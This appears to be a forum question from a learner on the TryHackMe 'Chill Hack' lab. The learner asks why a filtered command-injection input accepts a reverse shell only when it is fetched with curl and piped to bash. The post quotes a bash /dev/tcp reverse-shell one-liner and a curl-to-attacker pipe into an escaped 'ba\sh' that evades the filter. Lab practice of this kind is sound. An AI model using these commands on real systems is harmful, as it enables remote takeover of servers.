So im doing some pentesting in a TryHackme box (Chill Hack) and I've come to some trouble. In this box I have available an input in a website where I can inject commands to the vulnerable system.
This input has filters so I cannot use bash nor netcat without escaping the command characters.
Messing around I tried getting a reverse shell by using that input with netcat, of course escaped so the command should work.
The problem is the direct command does not work. Checking the walkthrough I've seen that the solution is to prepare a Bash shell (bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
), set up a web server and curl my attacking machine in order to pipe it to the bash command (Something like this: curl 10.9.223.50/shell.sh | ba\sh
)
Doing so provides me with a webshell.
The thing I don't understand is, why using the exact same command (The bash shell) in the input and escaping characters for avoiding any problem with that the command does not work but it does work when piping through the curl command?